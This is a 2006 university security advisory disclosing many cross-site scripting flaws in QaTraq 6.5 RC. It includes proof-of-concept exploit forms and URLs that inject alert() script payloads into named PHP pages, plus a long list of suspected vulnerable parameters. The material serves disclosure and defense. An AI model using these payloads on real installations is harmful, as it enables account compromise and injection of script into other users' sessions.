SecurityvulnsSECURITYVULNS:DOC:13301QaTraq 6.5 RC: Multiple XSS Vulnerabilities
===========================================================
QaTraq 6.5 RC: Multiple XSS Vulnerabilities
Technical University of Vienna Security Advisory
TUVSA-0606-001, June 23, 2006
Affected applications
QaTraq (http://sourceforge.net/projects/qatraq/)
Versions 6.5 RC and prior.
Description
There are a number of reflected XSS vulnerabilities, some of which are also stored XSS vulnerabilities
and perhaps even SQL injection vulnerabilitities. The affected program points as well as demo exploits
are given below. The exploits have been tested with the user being logged in as admin, and
register_globals being active. It is possible that some vulnerabilities do not require register_globals
to be enabled, although we have not tested this. Some of the parameters in the given sample exploits
(mainly "id" params) have to be adjusted to the given installation to match existing database entries.
In addition to program points for which exploits are given, we have listed about 200 places that are
very similar in structure. Although we have not explicitly tested them with exploits, we suspect that
they are vulnerable as well.
top.inc
components_copy_content.php
line 233
http://localhost/qatraq65rc/components_copy_content.php?product_id=1&id=1&msg=<script>alert('hi')</script>
[product_id and id (= component id) must exist in the database]
line 238
- use the attack page:
<form method="post" action="http://localhost/qatraq65rc/components_copy_content.php?product_id=1&id=1">
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="component_name" value='"><script>alert("hi")</script>'/>
<input type="submit"/>
</form>
line 260
- analogous to 238:
<form method="post" action="http://localhost/qatraq65rc/components_copy_content.php?product_id=1&id=1">
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="component_name" value='some_new_name'/>
<input type="hidden" name="component_desc" value='</textarea><script>alert("hi")</script>'/>
<input type="submit"/>
</form>
components_modify_content.php
line 218
<form method="post"
action="http://localhost/qatraq65rc/components_modify_content.php?product_id=1&id=1">
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="component_name" value='"><script>alert("hi")</script>'/>
<input type="submit"/>
</form>
line 240
<form method="post"
action="http://localhost/qatraq65rc/components_modify_content.php?product_id=1&id=1">
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="component_name" value='some_new_name'/>
<input type="hidden" name="component_desc" value='</textarea><script>alert("hi")</script>'/>
<input type="submit"/>
</form>
components_new_content.php
line 193
<form method="post" action="http://localhost/qatraq65rc/components_new_content.php?product_id=1&id=1">
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="component_name" value='"><script>alert("hi")</script>'/>
<input type="submit"/>
</form>
line 215
<form method="post" action="http://localhost/qatraq65rc/components_new_content.php?product_id=1&id=1">
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="component_name" value='another_new_name'/>
<input type="hidden" name="component_desc" value='</textarea><script>alert("hi")</script>'/>
<input type="submit"/>
</form>
design_copy_content.php
line 262
- use this page [plan_id must exist in the database]:
<form method="post" action="http://localhost/qatraq65rc/design_copy_content.php?id=777&plan_id=1">
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="title" value='"><script>alert("hi")</script>'/>
<input type="submit"/>
</form>
line 276
<form method="post" action="http://localhost/qatraq65rc/design_copy_content.php?id=777&plan_id=1">
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="version" value='<script>alert("hi")</script>'/>
<input type="submit"/>
</form>
line 313
<form method="post" action="http://localhost/qatraq65rc/design_copy_content.php?id=777&plan_id=1">
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="content" value='</textarea><script>alert("hi")</script>'/>
<input type="submit"/>
</form>
design_copy_plan_search.php
line 106
<form method="post" action="http://localhost/qatraq65rc/design_copy_plan_search.php?id=777&plan_id=1">
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="plan_title" value='"><script>alert("hi")</script>'/>
<input type="submit"/>
</form>
line 107
<form method="post" action="http://localhost/qatraq65rc/design_copy_plan_search.php?id=777&plan_id=1">
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="plan_content" value='"><script>alert("hi")</script>'/>
<input type="submit"/>
</form>
design_modify_content.php
line 282
<form method="post" action="http://localhost/qatraq65rc/design_modify_content.php?id=1&plan_id=1">
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="title" value='"><script>alert("hi")</script>'/>
<input type="submit"/>
</form>
line 298
- $new_doc_id is constructed from $major_version and $minor_version on line 189; these two are only
set if POST['version_increment'] is set; use this page [and watch for suitable id]:
<form method="post" action="http://localhost/qatraq65rc/design_modify_content.php?id=7">
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="minor_version" value='<script>alert("hi")</script>'/>
<input type="submit"/>
</form>
line 311
- $new_version, analogous to 298
line 354
<form method="post" action="http://localhost/qatraq65rc/design_modify_content.php?id=10">
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="content" value='</textarea><script>alert("hi")</script>'/>
<input type="submit"/>
</form>
design_new_content.php
line 226
<form method="post" action="http://localhost/qatraq65rc/design_new_content.php?id=777&plan_id=1">
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="title" value='"><script>alert("hi")</script>'/>
<input type="submit"/>
</form>
line 240
<form method="post" action="http://localhost/qatraq65rc/design_new_content.php?id=777&plan_id=1">
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="version" value='<script>alert("hi")</script>'/>
<input type="submit"/>
</form>
line 276
<form method="post" action="http://localhost/qatraq65rc/design_new_content.php?id=777&plan_id=1">
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="content" value='</textarea><script>alert("hi")</script>'/>
<input type="submit"/>
</form>
design_new_search.php
download.php
login.php
phase_copy_content.php
line 245
<form method="post" action="http://localhost/qatraq65rc/phase_copy_content.php?id=777&plan_id=1">
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="title" value='"><script>alert("hi")</script>'/>
<input type="submit"/>
</form>
line 259
<form method="post" action="http://localhost/qatraq65rc/phase_copy_content.php?id=777&plan_id=1">
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="version" value='<script>alert("hi")</script>'/>
<input type="submit"/>
</form>
line 285
<form method="post" action="http://localhost/qatraq65rc/phase_copy_content.php?id=777&plan_id=1">
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="content" value='</textarea><script>alert("hi")</script>'/>
<input type="submit"/>
</form>
phase_delete_search.php
line 176
<form method="post" action="http://localhost/qatraq65rc/phase_delete_search.php">
<input type="hidden" name="page_action" value="search"/>
<input type="hidden" name="content" value='"><script>alert("hi")</script>'/>
<input type="submit"/>
</form>
phase_modify_content.php
line 273
<form method="post" action="http://localhost/qatraq65rc/phase_modify_content.php?id=2&plan_id=1">
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="title" value='"><script>alert("hi")</script>'/>
<input type="submit"/>
</form>
line 289
<form method="post" action="http://localhost/qatraq65rc/phase_modify_content.php?id=2">
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="minor_version" value='<script>alert("hi")</script>'/>
<input type="submit"/>
</form>
line 302
- $new_version, analogous to 289
line 335
<form method="post" action="http://localhost/qatraq65rc/phase_modify_content.php?id=2">
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="content" value='</textarea><script>alert("hi")</script>'/>
<input type="submit"/>
</form>
phase_modify_search.php
line 177
<form method="post" action="http://localhost/qatraq65rc/phase_modify_search.php">
<input type="hidden" name="page_action" value="search"/>
<input type="hidden" name="content" value='"><script>alert("hi")</script>'/>
<input type="submit"/>
</form>
phase_new_content.php
line 209
<form method="post" action="http://localhost/qatraq65rc/phase_new_content.php?id=777&plan_id=1">
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="title" value='"><script>alert("hi")</script>'/>
<input type="submit"/>
</form>
line 223
<form method="post" action="http://localhost/qatraq65rc/phase_new_content.php?id=777&plan_id=1">
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="version" value='<script>alert("hi")</script>'/>
<input type="submit"/>
</form>
line 252
<form method="post" action="http://localhost/qatraq65rc/phase_new_content.php?id=777&plan_id=1">
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="content" value='</textarea><script>alert("hi")</script>'/>
<input type="submit"/>
</form>
phase_view_search.php
line 176
<form method="post" action="http://localhost/qatraq65rc/phase_view_search.php">
<input type="hidden" name="page_action" value="search"/>
<input type="hidden" name="content" value='"><script>alert("hi")</script>'/>
<input type="submit"/>
</form>
products_copy_content.php
line 180
<form method="post" action="http://localhost/qatraq65rc/products_copy_content.php?product_id=1&id=1">
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="product_name" value='"><script>alert("hi")</script>'/>
<input type="submit"/>
</form>
line 185
<form method="post" action="http://localhost/qatraq65rc/products_copy_content.php?product_id=1&id=1">
<input type="hidden" name="page_action" value="save"/>
<input type="hidden" name="product_name" value='some_new_name'/>
<input type="hidden" name="product_desc" value='</textarea><script>alert("hi")</script>'/>
<input type="submit"/>
</form>
Other suspicious places (without exploits)
- products_copy_search.php, line 116, $product_name
- products_copy_search.php, line 117, $product_desc
- products_delete_search.php, line 116, $product_name
- products_delete_search.php, line 117, $product_desc
- products_modify_content.php, line 186, $msg
- products_modify_content.php, line 191, $product_name
- products_modify_content.php, line 196, $product_desc
- products_modify_search.php, line 116, $product_name
- products_modify_search.php, line 117, $product_desc
- products_new_content.php, line 157, $msg
- products_new_content.php, line 162, $product_name
- products_new_content.php, line 167, $product_desc
- products_view_search.php, line 116, $product_name
- products_view_search.php, line 117, $product_desc
- queries_copy_content.php, line 182, $msg
- queries_copy_content.php, line 195, $title
- queries_copy_content.php, line 227, $description
- queries_copy_search.php, line 154, $title
- queries_copy_search.php, line 155, $id
- queries_copy_search.php, line 170, $description
- queries_delete_search.php, line 152, $title
- queries_delete_search.php, line 153, $id
- queries_delete_search.php, line 167, $description
- queries_modify_content.php, line 247, $msg
- queries_modify_content.php, line 260, $title
- queries_modify_content.php, line 292, $description
- queries_modify_content.php, line 308, $query
- queries_modify_search.php, line 152, $title
- queries_modify_search.php, line 153, $id
- queries_modify_search.php, line 167, $description
- queries_new_content.php, line 162, $msg
- queries_new_content.php, line 174, $title
- queries_new_content.php, line 222, $query
- queries_view_search.php, line 156, $title
- queries_view_search.php, line 157, $id
- queries_view_search.php, line 172, $description
- reports_copy_content.php, line 202, $msg
- reports_copy_content.php, line 215, $title
- reports_copy_content.php, line 247, $description
- reports_copy_content.php, line 255, $tmt
- reports_copy_search.php, line 147, $title
- reports_copy_search.php, line 148, $id
- reports_delete_search.php, line 148, $title
- reports_delete_search.php, line 149, $id
- reports_modify_content.php, line 266, $msg
- reports_modify_content.php, line 279, $title
- reports_modify_content.php, line 311, $description
- reports_modify_content.php, line 319, $query $tmt
- reports_modify_search.php, line 148, $title
- reports_modify_search.php, line 149, $id
- reports_new_content.php, line 162, $msg
- reports_new_content.php, line 174, $title
- reports_new_content.php, line 190, $report_type
- reports_new_content.php, line 206, $description
- reports_new_content.php, line 214, $query $tmt
- reports_view_content.php, line 187, $tmt
- reports_view_content.php, line 194, $results
- reports_view_search.php, line 147, $title
- reports_view_search.php, line 148, $id
- reports_view_search.php, line 147, $title
- reports_view_search.php, line 148, $id
- requ_copy_content.php, line 217, $title
- requ_copy_content.php, line 252, $url
- requ_copy_content.php, line 274, $content
- requ_modify_content.php, line 209, $title
- requ_modify_content.php, line 244, $url
- requ_modify_content.php, line 266, $content
- requ_new_content.php, line 185, $title
- requ_new_content.php, line 214, $url
- requ_new_content.php, line 237, $content
- requ_new_search.php, line 99, $product_name
- requ_new_search.php, line 100, $product_desc
- results_modify_multiple.php, line 657, -> includes/ui.inc, line 116
- results_modify_multiple.php, line 395, $msg
- results_modify_search.php, line 182, $content
- results_modify_single.php, line 429, $msg
- results_modify_single.php, line 850, $TestDate
- results_view_multiple.php, line 125, $msg
- results_view_search.php, line 182, $content
- results_view_single.php, line 164, $msg
- roles_copy_content.php, line 190, $msg
- roles_copy_content.php, line 195, $role_name
- roles_copy_content.php, line 200, $role_desc
- roles_copy_search.php, line 117, $role_name
- roles_copy_search.php, line 118, $role_desc
- roles_delete_search.php, line 118, $role_name
- roles_delete_search.php, line 119, $role_desc
- roles_modify_content.php, line 203, $msg
- roles_modify_content.php, line 208, $role_name
- roles_modify_content.php, line 213, $role_desc
- roles_modify_search.php, line 118, $role_name
- roles_modify_search.php, line 119, $role_desc
- roles_new_content.php, line 172, $msg
- roles_new_content.php, line 177, $role_name
- roles_new_content.php, line 182, $role_desc
- roles_view_search.php, line 118, $role_name
- roles_view_search.php, line 119, $role_desc
- test_cases_copy_content.php, line 357, -> includes/ui.inc, line 198, $base_url
- test_cases_copy_content.php, line 289, $title
- test_cases_copy_content.php, line 303, $version
- test_cases_copy_content.php, line 382, $content
- test_cases_modify_content.php, line 383, $title
- test_cases_modify_content.php, line 399, $new_doc_id
- test_cases_modify_content.php, line 412, $new_version
- test_cases_modify_content.php, line 486, $content
- test_cases_modify_content.php, line 536, $filter_title
- test_cases_modify_content.php, line 537, $filter_tsc_id
- test_cases_new_content.php, line 341, $title
- test_cases_new_content.php, line 355, $version
- test_cases_new_content.php, line 431, $content
- test_cases_new_content.php, line 481, $filter_title
- test_cases_new_content.php, line 482, $filter_tsc_id
- test_cases_new_search.php, line 99, $product_name
- test_cases_new_search.php, line 100, $product_desc
- test_cases_view_content.php, line 302, $filter_tsc_id
- test_plans_copy_content.php, line 274, $title
- test_plans_copy_content.php, line 292, $version
- test_plans_copy_content.php, line 344, $content
- test_plans_modify_content.php, line 306, $title
- test_plans_modify_content.php, line 322, $new_doc_id
- test_plans_modify_content.php, line 339, $new_version
- test_plans_modify_content.php, line 398, $content
- test_plans_new_content.php, line 240, $title
- test_plans_new_content.php, line 258, $version
- test_plans_new_content.php, line 313, $content
- test_plans_new_search.php, line 96, $project_name
- test_plans_new_search.php, line 97, $project_desc
- test_scripts_copy_content.php, line 354, $title
- test_scripts_copy_content.php, line 368, $version
- test_scripts_copy_content.php, line 500, $content
- test_scripts_copy_design_search.php, line 100, $design_title
- test_scripts_copy_search.php, line 180, $content
- test_scripts_delete_search.php, line 182, $content
- test_scripts_include_cases_search.php, line 417, -> includes/ui.inc, line 34, $table_name
- test_scripts_include_cases_search.php, line 1068, -> includes/ui.inc, line 34, $table_name
- test_scripts_include_cases_search.php, line 875, -> includes/ui.inc, line 198, $base_url
- test_scripts_include_cases_search.php, line 427, $msg
- test_scripts_include_cases_search.php, line 576, $test_script[Title]
- test_scripts_include_cases_search.php, line 798, $tc_msg
- test_scripts_include_cases_search.php, line 809, $tc_title
- test_scripts_include_cases_search.php, line 823, $tc_version
- test_scripts_include_cases_search.php, line 1074, $row[Title]
- test_scripts_include_cases_search.php, line 1084, $row
- test_scripts_include_cases_search.php, line 1087, $row
- test_scripts_include_cases_search.php, line 1096, $row[DocumentID]
- test_scripts_include_cases_search.php, line 1105, $row[ID]
- test_scripts_include_cases_search.php, line 1106, $row[ID]
- test_scripts_include_cases_search.php, line 1108, $row[ID]
- test_scripts_include_cases_search.php, line 1109, $row[ID]
- test_scripts_include_cases_search.php, line 1118, $row
- test_scripts_include_cases_search.php, line 1124, $row $ordering
- test_scripts_include_search.php, line 163, $content
- test_scripts_modify_content.php, line 404, $title
- test_scripts_modify_content.php, line 420, $new_doc_id
- test_scripts_modify_content.php, line 433, $new_version
- test_scripts_modify_content.php, line 581, $content
- test_scripts_modify_content.php, line 726, $ordering_
- test_scripts_modify_search.php, line 181, $content
- test_scripts_new_content.php, line 293, $title
- test_scripts_new_content.php, line 307, $version
- test_scripts_new_content.php, line 426, $content
- test_scripts_new_search.php, line 93, $design_title
- test_scripts_remove_cases_search.php, line 375, -> includes/ui.inc, line 34, $table_name
- test_scripts_remove_cases_search.php, line 138, -> includes/ui.inc, line 34, $table_name
- test_scripts_remove_cases_search.php, line 148, $msg
- test_scripts_remove_cases_search.php, line 256, $test_script[Title]
- test_scripts_remove_cases_search.php, line 381, $row[Title]
- test_scripts_remove_cases_search.php, line 387, $is_selected $row
- test_scripts_remove_cases_search.php, line 393, $row[DocumentID]
- test_scripts_remove_cases_search.php, line 405, $row[Ordering]
- test_scripts_remove_cases_search.php, line 423, $row[Title]
- test_scripts_remove_search.php, line 165, $content
- test_scripts_view_search.php, line 182, $content
- upload.php, line 51
- users_copy_content.php, line 249, $msg
- users_copy_content.php, line 254, $login_name
- users_copy_content.php, line 258, $user_name
- users_copy_content.php, line 263, $user_password
- users_copy_search.php, line 129, $login_name
- users_copy_search.php, line 130, $user_name
- users_copy_search.php, line 131, $default_role
- users_delete_content.php, line 146, $msg
- users_delete_search.php, line 129, $login_name
- users_delete_search.php, line 130, $user_name
- users_delete_search.php, line 131, $default_role
- users_modify_content.php, line 463, -> includes/ui.inc, line 116,
$arr_table_vals[table_multi_display_line.$i] - users_modify_content.php, line 385, $msg
- users_modify_content.php, line 394, $user_name
- users_modify_content.php, line 399, $user_password
- users_modify_search.php, line 127, $login_name
- users_modify_search.php, line 128, $user_name
- users_modify_search.php, line 129, $default_role
- users_new_content.php, line 233, $msg
- users_new_content.php, line 238, $login_name
- users_new_content.php, line 242, $user_name
- users_new_content.php, line 247, $user_password
- users_new_content.php, line 251, $user_password2
- users_view_content.php, line 138, $msg
- users_view_search.php, line 129, $login_name
- users_view_search.php, line 130, $user_name
- users_view_search.php, line 131, $default_role
- versions_copy_content.php, line 370, $msg
- versions_copy_content.php, line 375, $version_name
- versions_copy_content.php, line 380, $version_desc
- versions_modify_content.php, line 345, $msg
- versions_modify_content.php, line 350, $version_name
- versions_modify_content.php, line 355, $version_desc
- versions_new_content.php, line 322, $msg
- versions_new_content.php, line 327, $version_name
- versions_new_content.php, line 332, $version_desc
- versions_new_content.php, line 339, $version_date
Solution
The authors did not respond to our notification, so there is no official solution available yet.
Timeline:
June 2, 2006: Attempt to contact QaTraq developers via "ashmans at users dot sourceforge dot net" and
"traq at users dot sourceforge dot net".
June 23, 2006: Advisory submission.
References
http://www.seclab.tuwien.ac.at/advisories/TUVSA-0606-001.txt
Nenad Jovanovic
Secure Systems Lab
Technical University of Vienna
www.seclab.tuwien.ac.at